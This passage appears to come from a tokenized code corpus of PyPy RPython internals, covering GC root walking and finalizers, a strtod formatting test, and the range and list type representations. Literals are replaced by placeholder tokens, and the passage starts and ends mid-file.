constantrootsnongc : <EOL> if self . gcheap . gc . points_to_valid_gc_object ( addrofaddr ) : <EOL> collect_static_in_prebuilt_nongc ( gc , addrofaddr ) <EOL> if collect_stack_root : <EOL> for addrofaddr in gcheap . llinterp . find_roots ( ) : <EOL> if self . gcheap . gc . points_to_valid_gc_object ( addrofaddr ) : <EOL> collect_stack_root ( gc , addrofaddr ) <EOL> def _walk_prebuilt_gc ( self , collect ) : <EOL> for obj in self . gcheap . _all_prebuilt_gc : <EOL> collect ( llmemory . cast_ptr_to_adr ( obj . _as_ptr ( ) ) ) <EOL> class DirectRunLayoutBuilder ( gctypelayout . TypeLayoutBuilder ) : <EOL> def __init__ ( self , GCClass , lltype2vtable , llinterp ) : <EOL> self . llinterp = llinterp <EOL> super ( DirectRunLayoutBuilder , self ) . __init__ ( GCClass , lltype2vtable ) <EOL> def make_finalizer_funcptr_for_type ( self , TYPE ) : <EOL> from pypy . rpython . memory . gctransform . support import get_rtti , type_contains_pyobjs <EOL> rtti = get_rtti ( TYPE ) <EOL> if rtti is not None and hasattr ( rtti . _obj , '<STR_LIT>' ) : <EOL> destrptr = rtti . _obj . destructor_funcptr <EOL> DESTR_ARG = lltype . typeOf ( destrptr ) . TO . ARGS [ <NUM_LIT:0> ] <EOL> destrgraph = destrptr . _obj . graph <EOL> else : <EOL> return lltype . nullptr ( gctypelayout . GCData . FINALIZERTYPE . TO ) <EOL> assert not type_contains_pyobjs ( TYPE ) , "<STR_LIT>" <EOL> def ll_finalizer ( addr ) : <EOL> try : <EOL> v = llmemory . cast_adr_to_ptr ( addr , DESTR_ARG ) <EOL> self . llinterp . eval_graph ( destrgraph , [ v ] , recursive = True ) <EOL> except llinterp . LLException : <EOL> raise RuntimeError ( <EOL> "<STR_LIT>" ) <EOL> return llhelper ( gctypelayout . GCData . FINALIZERTYPE , ll_finalizer ) <EOL> def collect_constants ( graphs ) : <EOL> constants = { } <EOL> def collect_args ( args ) : <EOL> for arg in args : <EOL> if ( isinstance ( arg , Constant ) and <EOL> arg . concretetype is not lltype . Void ) : <EOL> reccollect ( constants , arg . 
value ) <EOL> for graph in graphs : <EOL> for block in graph . iterblocks ( ) : <EOL> collect_args ( block . inputargs ) <EOL> for op in block . operations : <EOL> collect_args ( op . args ) <EOL> for link in graph . iterlinks ( ) : <EOL> collect_args ( link . args ) <EOL> if hasattr ( link , "<STR_LIT>" ) : <EOL> reccollect ( constants , link . llexitcase ) <EOL> return constants <EOL> def reccollect ( constants , llvalue ) : <EOL> if ( isinstance ( llvalue , lltype . _abstract_ptr ) <EOL> and llvalue . _obj is not None and llvalue . _obj not in constants <EOL> and not isinstance ( llvalue . _obj , int ) ) : <EOL> TYPE = llvalue . _T <EOL> constants [ llvalue . _obj ] = True <EOL> if isinstance ( TYPE , lltype . Struct ) : <EOL> for name in TYPE . _names : <EOL> reccollect ( constants , getattr ( llvalue , name ) ) <EOL> elif isinstance ( TYPE , lltype . Array ) : <EOL> for llitem in llvalue : <EOL> reccollect ( constants , llitem ) <EOL> parent , parentindex = lltype . parentlink ( llvalue . _obj ) <EOL> if parent is not None : <EOL> reccollect ( constants , parent . _as_ptr ( ) ) <EOL> def prepare_graphs_and_create_gc ( llinterp , GCClass , GC_PARAMS = { } ) : <EOL> flowgraphs = llinterp . typer . annotator . translator . graphs [ : ] <EOL> llinterp . heap = GCManagedHeap ( llinterp , flowgraphs , GCClass , GC_PARAMS ) </s>
<s> import py <EOL> from pypy . rpython . test . tool import BaseRtypingTest , LLRtypeMixin , OORtypeMixin <EOL> from pypy . rlib import rarithmetic <EOL> class BaseTestStrtod ( BaseRtypingTest ) : <EOL> def test_formatd ( self ) : <EOL> def f ( y ) : <EOL> return rarithmetic . formatd ( "<STR_LIT>" , y ) <EOL> assert self . ll_to_string ( self . interpret ( f , [ <NUM_LIT> ] ) ) == f ( <NUM_LIT> ) <EOL> def test_parts_to_float ( self ) : <EOL> from pypy . rpython . annlowlevel import hlstr <EOL> def f ( a , b , c , d ) : <EOL> a , b , c , d = hlstr ( a ) , hlstr ( b ) , hlstr ( c ) , hlstr ( d ) <EOL> return rarithmetic . parts_to_float ( a , b , c , d ) <EOL> data = [ <EOL> ( ( "<STR_LIT>" , "<STR_LIT:1>" , "<STR_LIT>" , "<STR_LIT>" ) , <NUM_LIT:1.0> ) , <EOL> ( ( "<STR_LIT:->" , "<STR_LIT:1>" , "<STR_LIT>" , "<STR_LIT>" ) , - <NUM_LIT:1.0> ) , <EOL> ( ( "<STR_LIT:->" , "<STR_LIT:1>" , "<STR_LIT:5>" , "<STR_LIT>" ) , - <NUM_LIT> ) , <EOL> ( ( "<STR_LIT:->" , "<STR_LIT:1>" , "<STR_LIT:5>" , "<STR_LIT:2>" ) , - <NUM_LIT> ) , <EOL> ( ( "<STR_LIT:->" , "<STR_LIT:1>" , "<STR_LIT:5>" , "<STR_LIT>" ) , - <NUM_LIT> ) , <EOL> ( ( "<STR_LIT:->" , "<STR_LIT:1>" , "<STR_LIT:5>" , "<STR_LIT>" ) , - <NUM_LIT> ) , <EOL> ] <EOL> for parts , val in data : <EOL> args = [ self . string_to_ll ( i ) for i in parts ] <EOL> assert self . interpret ( f , args ) == val <EOL> class TestLLStrtod ( BaseTestStrtod , LLRtypeMixin ) : <EOL> pass </s>
<s> from pypy . rpython . ootypesystem . ootype import Signed , Record , new <EOL> from pypy . rpython . rrange import AbstractRangeRepr , AbstractRangeIteratorRepr <EOL> RANGE = Record ( { "<STR_LIT:start>" : Signed , "<STR_LIT>" : Signed } ) <EOL> RANGEITER = Record ( { "<STR_LIT>" : Signed , "<STR_LIT>" : Signed } ) <EOL> RANGEST = Record ( { "<STR_LIT:start>" : Signed , "<STR_LIT>" : Signed , "<STR_LIT>" : Signed } ) <EOL> RANGESTITER = Record ( { "<STR_LIT>" : Signed , "<STR_LIT>" : Signed , "<STR_LIT>" : Signed } ) <EOL> class RangeRepr ( AbstractRangeRepr ) : <EOL> RANGE = RANGE <EOL> RANGEITER = RANGEITER <EOL> RANGEST = RANGEST <EOL> RANGESTITER = RANGESTITER <EOL> getfield_opname = "<STR_LIT>" <EOL> def __init__ ( self , * args ) : <EOL> AbstractRangeRepr . __init__ ( self , * args ) <EOL> self . ll_newrange = ll_newrange <EOL> self . ll_newrangest = ll_newrangest <EOL> def make_iterator_repr ( self ) : <EOL> return RangeIteratorRepr ( self ) <EOL> def ll_newrange ( _RANGE , start , stop ) : <EOL> l = new ( RANGE ) <EOL> l . start = start <EOL> l . stop = stop <EOL> return l <EOL> def ll_newrangest ( start , stop , step ) : <EOL> if step == <NUM_LIT:0> : <EOL> raise ValueError <EOL> l = new ( RANGEST ) <EOL> l . start = start <EOL> l . stop = stop <EOL> l . step = step <EOL> return l <EOL> class RangeIteratorRepr ( AbstractRangeIteratorRepr ) : <EOL> def __init__ ( self , * args ) : <EOL> AbstractRangeIteratorRepr . __init__ ( self , * args ) <EOL> self . ll_rangeiter = ll_rangeiter <EOL> def ll_rangeiter ( ITER , rng ) : <EOL> iter = new ( ITER ) <EOL> iter . next = rng . start <EOL> iter . stop = rng . stop <EOL> if ITER is RANGESTITER : <EOL> iter . step = rng . step <EOL> return iter </s>
<s> from pypy . tool . pairtype import pairtype , pair <EOL> from pypy . objspace . flow . model import Constant <EOL> from pypy . annotation import model as annmodel <EOL> from pypy . rpython . error import TyperError <EOL> from pypy . rpython . rmodel import Repr , IteratorRepr , IntegerRepr , inputconst <EOL> from pypy . rpython . rstr import AbstractStringRepr , AbstractCharRepr <EOL> from pypy . rpython . lltypesystem . lltype import typeOf , Ptr , Void , Signed , Bool <EOL> from pypy . rpython . lltypesystem . lltype import nullptr , Char , UniChar , Number <EOL> from pypy . rpython import robject <EOL> from pypy . rlib . objectmodel import malloc_zero_filled <EOL> from pypy . rlib . debug import ll_assert <EOL> from pypy . rlib . rarithmetic import ovfcheck , widen <EOL> from pypy . rpython . annlowlevel import ADTInterface <EOL> ADTIFixedList = ADTInterface ( None , { <EOL> '<STR_LIT>' : ( [ '<STR_LIT>' , Signed ] , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( [ '<STR_LIT>' ] , Signed ) , <EOL> '<STR_LIT>' : ( [ '<STR_LIT>' , Signed ] , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( [ '<STR_LIT>' , Signed , '<STR_LIT>' ] , Void ) , <EOL> } ) <EOL> ADTIList = ADTInterface ( ADTIFixedList , { <EOL> '<STR_LIT>' : ( [ '<STR_LIT>' , Signed ] , Void ) , <EOL> '<STR_LIT>' : ( [ '<STR_LIT>' , Signed ] , Void ) , <EOL> '<STR_LIT>' : ( [ '<STR_LIT>' , Signed ] , Void ) , <EOL> } ) <EOL> def dum_checkidx ( ) : pass <EOL> def dum_nocheck ( ) : pass <EOL> class __extend__ ( annmodel . SomeList ) : <EOL> def rtyper_makerepr ( self , rtyper ) : <EOL> listitem = self . listdef . listitem <EOL> s_value = listitem . s_value <EOL> if ( listitem . range_step is not None and not listitem . mutated and <EOL> not isinstance ( s_value , annmodel . SomeImpossibleValue ) ) : <EOL> return rtyper . type_system . rrange . RangeRepr ( listitem . range_step ) <EOL> elif ( s_value . __class__ is annmodel . SomeObject and s_value . knowntype == object ) : <EOL> return robject . 
pyobj_repr <EOL> else : <EOL> rlist = rtyper . type_system . rlist <EOL> item_repr = lambda : rtyper . getrepr ( listitem . s_value ) <EOL> known_maxlength = getattr ( self , '<STR_LIT>' , False ) <EOL> if self . listdef . listitem . resized : <EOL> return rlist . ListRepr ( rtyper , item_repr , listitem , known_maxlength ) <EOL> else : <EOL> return rlist . FixedSizeListRepr ( rtyper , item_repr , listitem ) <EOL> def rtyper_makekey ( self ) : <EOL> self . listdef . listitem . dont_change_any_more = True <EOL> known_maxlength = getattr ( self , '<STR_LIT>' , False ) <EOL> return self . __class__ , self . listdef . listitem , known_maxlength <EOL> class AbstractBaseListRepr ( Repr ) : <EOL> eq_func_cache = None <EOL> def recast ( self , llops , v ) : <EOL> return llops . convertvar ( v , self . item_repr , self . external_item_repr ) <EOL> def convert_const ( self , listobj ) : <EOL> if listobj is None : <EOL> return self . null_const ( ) <EOL> if not isinstance ( listobj , list ) : <EOL> raise TyperError ( "<STR_LIT>" % ( listobj , ) ) <EOL> try : <EOL> key = Constant ( listobj ) <EOL> return self . list_cache [ key ] <EOL> except KeyError : <EOL> self . setup ( ) <EOL> n = len ( listobj ) <EOL> result = self . prepare_const ( n ) <EOL> self . list_cache [ key ] = result <EOL> r_item = self . item_repr <EOL> if r_item . lowleveltype is not Void : <EOL> for i in range ( n ) : <EOL> x = listobj [ i ] <EOL> result . ll_setitem_fast ( i , r_item . convert_const ( x ) ) <EOL> return result <EOL> def null_const ( self ) : <EOL> raise NotImplementedError <EOL> def prepare_const ( self , nitems ) : <EOL> raise NotImplementedError <EOL> def ll_str ( self , l ) : <EOL> constant = self . rstr_ll . ll_constant <EOL> start = self . rstr_ll . ll_build_start <EOL> push = self . rstr_ll . ll_build_push <EOL> finish = self . rstr_ll . ll_build_finish <EOL> length = l . 
ll_length ( ) <EOL> if length == <NUM_LIT:0> : <EOL> return constant ( "<STR_LIT>" ) <EOL> buf = start ( <NUM_LIT:2> * length + <NUM_LIT:1> ) <EOL> push ( buf , constant ( "<STR_LIT:[>" ) , <NUM_LIT:0> ) <EOL> item_repr = self . item_repr <EOL> i = <NUM_LIT:0> <EOL> while i < length : <EOL> if i > <NUM_LIT:0> : <EOL> push ( buf , constant ( "<STR_LIT:U+002CU+0020>" ) , <NUM_LIT:2> * i ) <EOL> item = l . ll_getitem_fast ( i ) <EOL> push ( buf , item_repr . ll_str ( item ) , <NUM_LIT:2> * i + <NUM_LIT:1> ) <EOL> i += <NUM_LIT:1> <EOL> push ( buf , constant ( "<STR_LIT:]>" ) , <NUM_LIT:2> * length ) <EOL> return finish ( buf ) <EOL> def rtype_bltn_list ( self , hop ) : <EOL> v_lst = hop . inputarg ( self , <NUM_LIT:0> ) <EOL> cRESLIST = hop . inputconst ( Void , hop . r_result . LIST ) <EOL> return hop . gendirectcall ( ll_copy , cRESLIST , v_lst ) <EOL> def rtype_len ( self , hop ) : <EOL> v_lst , = hop . inputargs ( self ) <EOL> if hop . args_s [ <NUM_LIT:0> ] . listdef . listitem . resized : <EOL> ll_func = ll_len <EOL> else : <EOL> ll_func = ll_len_foldable <EOL> return hop . gendirectcall ( ll_func , v_lst ) <EOL> def rtype_is_true ( self , hop ) : <EOL> v_lst , = hop . inputargs ( self ) <EOL> if hop . args_s [ <NUM_LIT:0> ] . listdef . listitem . resized : <EOL> ll_func = ll_list_is_true <EOL> else : <EOL> ll_func = ll_list_is_true_foldable <EOL> return hop . gendirectcall ( ll_func , v_lst ) <EOL> def rtype_method_reverse ( self , hop ) : <EOL> v_lst , = hop . inputargs ( self ) <EOL> hop . exception_cannot_occur ( ) <EOL> hop . gendirectcall ( ll_reverse , v_lst ) <EOL> def rtype_method_remove ( self , hop ) : <EOL> v_lst , v_value = hop . inputargs ( self , self . item_repr ) <EOL> hop . has_implicit_exception ( ValueError ) <EOL> hop . exception_is_here ( ) <EOL> return hop . gendirectcall ( ll_listremove , v_lst , v_value , <EOL> self . get_eqfunc ( ) ) <EOL> def rtype_method_index ( self , hop ) : <EOL> v_lst , v_value = hop . inputargs ( self , self . 
item_repr ) <EOL> hop . has_implicit_exception ( ValueError ) <EOL> hop . exception_is_here ( ) <EOL> return hop . gendirectcall ( ll_listindex , v_lst , v_value , self . get_eqfunc ( ) ) <EOL> def get_ll_eq_function ( self ) : <EOL> result = self . eq_func_cache <EOL> if result is not None : <EOL> return result <EOL> def list_eq ( l1 , l2 ) : <EOL> return ll_listeq ( l1 , l2 , item_eq_func ) <EOL> self . eq_func_cache = list_eq <EOL> item_eq_func = self . item_repr . get_ll_eq_function ( ) <EOL> return list_eq <EOL> def _get_v_maxlength ( self , hop ) : <EOL> from pypy . rpython . rint import signed_repr <EOL> v_iterable = hop . args_v [ <NUM_LIT:1> ] <EOL> s_iterable = hop . args_s [ <NUM_LIT:1> ] <EOL> r_iterable = hop . args_r [ <NUM_LIT:1> ] <EOL> hop2 = hop . copy ( ) <EOL> while hop2 . nb_args > <NUM_LIT:0> : <EOL> hop2 . r_s_popfirstarg ( ) <EOL> hop2 . v_s_insertfirstarg ( v_iterable , s_iterable ) <EOL> hop2 . r_result = signed_repr <EOL> v_maxlength = r_iterable . rtype_len ( hop2 ) <EOL> return v_maxlength <EOL> class AbstractListRepr ( AbstractBaseListRepr ) : <EOL> def rtype_method_append ( self , hop ) : <EOL> v_lst , v_value = hop . inputargs ( self , self . item_repr ) <EOL> hop . exception_cannot_occur ( ) <EOL> hop . gendirectcall ( ll_append , v_lst , v_value ) <EOL> def rtype_method_insert ( self , hop ) : <EOL> v_lst , v_index , v_value = hop . inputargs ( self , Signed , self . item_repr ) <EOL> arg1 = hop . args_s [ <NUM_LIT:1> ] <EOL> args = v_lst , v_index , v_value <EOL> if arg1 . is_constant ( ) and arg1 . const == <NUM_LIT:0> : <EOL> llfn = ll_prepend <EOL> args = v_lst , v_value <EOL> elif arg1 . nonneg : <EOL> llfn = ll_insert_nonneg <EOL> else : <EOL> raise TyperError ( "<STR_LIT>" ) <EOL> hop . exception_cannot_occur ( ) <EOL> hop . gendirectcall ( llfn , * args ) <EOL> def rtype_method_extend ( self , hop ) : <EOL> v_lst1 , v_lst2 = hop . inputargs ( * hop . args_r ) <EOL> hop . exception_cannot_occur ( ) <EOL> hop . 
gendirectcall ( ll_extend , v_lst1 , v_lst2 ) <EOL> def rtype_method_pop ( self , hop ) : <EOL> if hop . has_implicit_exception ( IndexError ) : <EOL> spec = dum_checkidx <EOL> else : <EOL> spec = dum_nocheck <EOL> v_func = hop . inputconst ( Void , spec ) <EOL> if hop . nb_args == <NUM_LIT:2> : <EOL> args = hop . inputargs ( self , Signed ) <EOL> assert hasattr ( args [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> arg1 = hop . args_s [ <NUM_LIT:1> ] <EOL> if arg1 . is_constant ( ) and arg1 . const == <NUM_LIT:0> : <EOL> llfn = ll_pop_zero <EOL> args = args [ : <NUM_LIT:1> ] <EOL> elif hop . args_s [ <NUM_LIT:1> ] . nonneg : <EOL> llfn = ll_pop_nonneg <EOL> else : <EOL> llfn = ll_pop <EOL> else : <EOL> args = hop . inputargs ( self ) <EOL> llfn = ll_pop_default <EOL> hop . exception_is_here ( ) <EOL> v_res = hop . gendirectcall ( llfn , v_func , * args ) <EOL> return self . recast ( hop . llops , v_res ) <EOL> class AbstractFixedSizeListRepr ( AbstractBaseListRepr ) : <EOL> pass <EOL> class __extend__ ( pairtype ( AbstractBaseListRepr , Repr ) ) : <EOL> def rtype_contains ( ( r_lst , _ ) , hop ) : <EOL> v_lst , v_any = hop . inputargs ( r_lst , r_lst . item_repr ) <EOL> hop . exception_cannot_occur ( ) <EOL> return hop . gendirectcall ( ll_listcontains , v_lst , v_any , r_lst . get_eqfunc ( ) ) <EOL> class __extend__ ( pairtype ( AbstractBaseListRepr , IntegerRepr ) ) : <EOL> def rtype_getitem ( ( r_lst , r_int ) , hop , checkidx = False ) : <EOL> if checkidx : <EOL> spec = dum_checkidx <EOL> else : <EOL> spec = dum_nocheck <EOL> v_func = hop . inputconst ( Void , spec ) <EOL> v_lst , v_index = hop . inputargs ( r_lst , Signed ) <EOL> if hop . args_s [ <NUM_LIT:0> ] . listdef . listitem . mutated : <EOL> if hop . args_s [ <NUM_LIT:1> ] . nonneg : <EOL> llfn = ll_getitem_nonneg <EOL> else : <EOL> llfn = ll_getitem <EOL> else : <EOL> if hop . args_s [ <NUM_LIT:1> ] . 
nonneg : <EOL> llfn = ll_getitem_foldable_nonneg <EOL> else : <EOL> llfn = ll_getitem_foldable <EOL> if checkidx : <EOL> hop . exception_is_here ( ) <EOL> else : <EOL> hop . exception_cannot_occur ( ) <EOL> v_res = hop . gendirectcall ( llfn , v_func , v_lst , v_index ) <EOL> return r_lst . recast ( hop . llops , v_res ) <EOL> rtype_getitem_key = rtype_getitem <EOL> def rtype_getitem_idx ( ( r_lst , r_int ) , hop ) : <EOL> return pair ( r_lst , r_int ) . rtype_getitem ( hop , checkidx = True ) <EOL> rtype_getitem_idx_key = rtype_getitem_idx <EOL> def rtype_setitem ( ( r_lst , r_int ) , hop ) : <EOL> if hop . has_implicit_exception ( IndexError ) : <EOL> spec = dum_checkidx <EOL> else : <EOL> spec = dum_nocheck <EOL> v_func = hop . inputconst ( Void , spec ) <EOL> v_lst , v_index , v_item = hop . inputargs ( r_lst , Signed , r_lst . item_repr ) <EOL> if hop . args_s [ <NUM_LIT:1> ] . nonneg : <EOL> llfn = ll_setitem_nonneg <EOL> else : <EOL> llfn = ll_setitem <EOL> hop . exception_is_here ( ) <EOL> return hop . gendirectcall ( llfn , v_func , v_lst , v_index , v_item ) <EOL> def rtype_mul ( ( r_lst , r_int ) , hop ) : <EOL> cRESLIST = hop . inputconst ( Void , hop . r_result . LIST ) <EOL> v_lst , v_factor = hop . inputargs ( r_lst , Signed ) <EOL> return hop . gendirectcall ( ll_mul , cRESLIST , v_lst , v_factor ) <EOL> class __extend__ ( pairtype ( AbstractListRepr , IntegerRepr ) ) : <EOL> def rtype_delitem ( ( r_lst , r_int ) , hop ) : <EOL> if hop . has_implicit_exception ( IndexError ) : <EOL> spec = dum_checkidx <EOL> else : <EOL> spec = dum_nocheck <EOL> v_func = hop . inputconst ( Void , spec ) <EOL> v_lst , v_index = hop . inputargs ( r_lst , Signed ) <EOL> if hop . args_s [ <NUM_LIT:1> ] . nonneg : <EOL> llfn = ll_delitem_nonneg <EOL> else : <EOL> llfn = ll_delitem <EOL> hop . exception_is_here ( ) <EOL> return hop . gendirectcall ( llfn , v_func , v_lst , v_index ) <EOL> def rtype_inplace_mul ( ( r_lst , r_int ) , hop ) : <EOL> v_lst , v_factor = hop . 
inputargs ( r_lst , Signed ) <EOL> return hop . gendirectcall ( ll_inplace_mul , v_lst , v_factor ) <EOL> class __extend__ ( pairtype ( AbstractBaseListRepr , AbstractBaseListRepr ) ) : <EOL> def convert_from_to ( ( r_lst1 , r_lst2 ) , v , llops ) : <EOL> if r_lst1 . listitem is None or r_lst2 . listitem is None : <EOL> return NotImplemented <EOL> if r_lst1 . listitem is not r_lst2 . listitem : <EOL> return NotImplemented <EOL> return v <EOL> def rtype_eq ( ( r_lst1 , r_lst2 ) , hop ) : <EOL> assert r_lst1 . item_repr == r_lst2 . item_repr <EOL> v_lst1 , v_lst2 = hop . inputargs ( r_lst1 , r_lst2 ) <EOL> return hop . gendirectcall ( ll_listeq , v_lst1 , v_lst2 , r_lst1 . get_eqfunc ( ) ) <EOL> def rtype_ne ( ( r_lst1 , r_lst2 ) , hop ) : <EOL> assert r_lst1 . item_repr == r_lst2 . item_repr <EOL> v_lst1 , v_lst2 = hop . inputargs ( r_lst1 , r_lst2 ) <EOL> flag = hop . gendirectcall ( ll_listeq , v_lst1 , v_lst2 , r_lst1 . get_eqfunc ( ) ) <EOL> return hop . genop ( '<STR_LIT>' , [ flag ] , resulttype = Bool ) <EOL> def rtype_newlist ( hop ) : <EOL> nb_args = hop . nb_args <EOL> r_list = hop . r_result <EOL> if r_list == robject . pyobj_repr : <EOL> clist = hop . inputconst ( robject . pyobj_repr , list ) <EOL> v_result = hop . genop ( '<STR_LIT>' , [ clist ] , resulttype = robject . pyobj_repr ) <EOL> cname = hop . inputconst ( robject . pyobj_repr , '<STR_LIT>' ) <EOL> v_meth = hop . genop ( '<STR_LIT>' , [ v_result , cname ] , resulttype = robject . pyobj_repr ) <EOL> for i in range ( nb_args ) : <EOL> v_item = hop . inputarg ( robject . pyobj_repr , arg = i ) <EOL> hop . genop ( '<STR_LIT>' , [ v_meth , v_item ] , resulttype = robject . pyobj_repr ) <EOL> return v_result <EOL> r_listitem = r_list . item_repr <EOL> items_v = [ hop . inputarg ( r_listitem , arg = i ) for i in range ( nb_args ) ] <EOL> return hop . rtyper . type_system . rlist . newlist ( hop . llops , r_list , items_v ) <EOL> def rtype_alloc_and_set ( hop ) : <EOL> r_list = hop . 
r_result <EOL> if r_list == robject . pyobj_repr : <EOL> raise Exception , '<STR_LIT>' <EOL> v_count , v_item = hop . inputargs ( Signed , r_list . item_repr ) <EOL> cLIST = hop . inputconst ( Void , r_list . LIST ) <EOL> return hop . gendirectcall ( ll_alloc_and_set , cLIST , v_count , v_item ) <EOL> class __extend__ ( pairtype ( AbstractBaseListRepr , AbstractBaseListRepr ) ) : <EOL> def rtype_add ( ( r_lst1 , r_lst2 ) , hop ) : <EOL> v_lst1 , v_lst2 = hop . inputargs ( r_lst1 , r_lst2 ) <EOL> cRESLIST = hop . inputconst ( Void , hop . r_result . LIST ) <EOL> return hop . gendirectcall ( ll_concat , cRESLIST , v_lst1 , v_lst2 ) <EOL> class __extend__ ( pairtype ( AbstractListRepr , AbstractBaseListRepr ) ) : <EOL> def rtype_inplace_add ( ( r_lst1 , r_lst2 ) , hop ) : <EOL> v_lst1 , v_lst2 = hop . inputargs ( r_lst1 , r_lst2 ) <EOL> hop . gendirectcall ( ll_extend , v_lst1 , v_lst2 ) <EOL> return v_lst1 <EOL> class __extend__ ( pairtype ( AbstractListRepr , AbstractStringRepr ) ) : <EOL> def rtype_inplace_add ( ( r_lst1 , r_str2 ) , hop ) : <EOL> if r_lst1 . item_repr . lowleveltype not in ( Char , UniChar ) : <EOL> raise TyperError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> string_repr = r_str2 . repr <EOL> v_lst1 , v_str2 = hop . inputargs ( r_lst1 , string_repr ) <EOL> c_strlen = hop . inputconst ( Void , string_repr . ll . ll_strlen ) <EOL> c_stritem = hop . inputconst ( Void , string_repr . ll . ll_stritem_nonneg ) <EOL> hop . gendirectcall ( ll_extend_with_str , v_lst1 , v_str2 , <EOL> c_strlen , c_stritem ) <EOL> return v_lst1 <EOL> def rtype_extend_with_str_slice ( ( r_lst1 , r_str2 ) , hop ) : <EOL> if r_lst1 . item_repr . lowleveltype not in ( Char , UniChar ) : <EOL> raise TyperError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> string_repr = r_lst1 . rtyper . type_system . rstr . string_repr <EOL> v_lst1 = hop . inputarg ( r_lst1 , arg = <NUM_LIT:0> ) <EOL> v_str2 = hop . inputarg ( string_repr , arg = <NUM_LIT:3> ) <EOL> kind , vlist = hop . 
decompose_slice_args ( ) <EOL> c_strlen = hop . inputconst ( Void , string_repr . ll . ll_strlen ) <EOL> c_stritem = hop . inputconst ( Void , string_repr . ll . ll_stritem_nonneg ) <EOL> ll_fn = globals ( ) [ '<STR_LIT>' % kind ] <EOL> hop . gendirectcall ( ll_fn , v_lst1 , v_str2 , c_strlen , c_stritem , * vlist ) <EOL> return v_lst1 <EOL> class __extend__ ( pairtype ( AbstractListRepr , AbstractCharRepr ) ) : <EOL> def rtype_extend_with_char_count ( ( r_lst1 , r_chr2 ) , hop ) : <EOL> if r_lst1 . item_repr . lowleveltype not in ( Char , UniChar ) : <EOL> raise TyperError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> char_repr = r_lst1 . rtyper . type_system . rstr . char_repr <EOL> v_lst1 , v_chr , v_count = hop . inputargs ( r_lst1 , char_repr , Signed ) <EOL> hop . gendirectcall ( ll_extend_with_char_count , v_lst1 , v_chr , v_count ) <EOL> return v_lst1 <EOL> class __extend__ ( AbstractBaseListRepr ) : <EOL> def rtype_getslice ( r_lst , hop ) : <EOL> cRESLIST = hop . inputconst ( Void , hop . r_result . LIST ) <EOL> v_lst = hop . inputarg ( r_lst , arg = <NUM_LIT:0> ) <EOL> kind , vlist = hop . decompose_slice_args ( ) <EOL> ll_listslice = globals ( ) [ '<STR_LIT>' % kind ] <EOL> return hop . gendirectcall ( ll_listslice , cRESLIST , v_lst , * vlist ) <EOL> def rtype_setslice ( r_lst , hop ) : <EOL> v_lst = hop . inputarg ( r_lst , arg = <NUM_LIT:0> ) <EOL> kind , vlist = hop . decompose_slice_args ( ) <EOL> if kind != '<STR_LIT>' : <EOL> raise TyperError ( '<STR_LIT>' % ( <EOL> kind , ) ) <EOL> v_start , v_stop = vlist <EOL> v_lst2 = hop . inputarg ( hop . args_r [ <NUM_LIT:3> ] , arg = <NUM_LIT:3> ) <EOL> hop . gendirectcall ( ll_listsetslice , v_lst , v_start , v_stop , v_lst2 ) <EOL> def rtype_delslice ( r_lst , hop ) : <EOL> v_lst = hop . inputarg ( r_lst , arg = <NUM_LIT:0> ) <EOL> kind , vlist = hop . decompose_slice_args ( ) <EOL> ll_listdelslice = globals ( ) [ '<STR_LIT>' % kind ] <EOL> return hop . 
gendirectcall ( ll_listdelslice , v_lst , * vlist ) <EOL> class AbstractListIteratorRepr ( IteratorRepr ) : <EOL> def newiter ( self , hop ) : <EOL> v_lst , = hop . inputargs ( self . r_list ) <EOL> citerptr = hop . inputconst ( Void , self . lowleveltype ) <EOL> return hop . gendirectcall ( self . ll_listiter , citerptr , v_lst ) <EOL> def rtype_next ( self , hop ) : <EOL> v_iter , = hop . inputargs ( self ) <EOL> hop . has_implicit_exception ( StopIteration ) <EOL> hop . exception_is_here ( ) <EOL> v_res = hop . gendirectcall ( self . ll_listnext , v_iter ) <EOL> return self . r_list . recast ( hop . llops , v_res ) <EOL> def ll_alloc_and_set ( LIST , count , item ) : <EOL> if count < <NUM_LIT:0> : <EOL> count = <NUM_LIT:0> <EOL> l = LIST . ll_newlist ( count ) <EOL> T = typeOf ( item ) <EOL> if T is Char or T is UniChar : <EOL> check = ord ( item ) <EOL> elif isinstance ( T , Number ) : <EOL> check = widen ( item ) <EOL> else : <EOL> check = item <EOL> if ( not malloc_zero_filled ) or check : <EOL> i = <NUM_LIT:0> <EOL> while i < count : <EOL> l . ll_setitem_fast ( i , item ) <EOL> i += <NUM_LIT:1> <EOL> return l <EOL> ll_alloc_and_set . oopspec = '<STR_LIT>' <EOL> def ll_null_item ( lst ) : <EOL> LIST = typeOf ( lst ) <EOL> if isinstance ( LIST , Ptr ) : <EOL> ITEM = LIST . TO . ITEM <EOL> if isinstance ( ITEM , Ptr ) : <EOL> return nullptr ( ITEM . TO ) <EOL> return None <EOL> def listItemType ( lst ) : <EOL> LIST = typeOf ( lst ) <EOL> if isinstance ( LIST , Ptr ) : <EOL> LIST = LIST . TO <EOL> return LIST . ITEM <EOL> def ll_copy ( RESLIST , l ) : <EOL> length = l . ll_length ( ) <EOL> new_lst = RESLIST . ll_newlist ( length ) <EOL> i = <NUM_LIT:0> <EOL> while i < length : <EOL> new_lst . ll_setitem_fast ( i , l . ll_getitem_fast ( i ) ) <EOL> i += <NUM_LIT:1> <EOL> return new_lst <EOL> def ll_len ( l ) : <EOL> return l . ll_length ( ) <EOL> def ll_list_is_true ( l ) : <EOL> return bool ( l ) and l . 
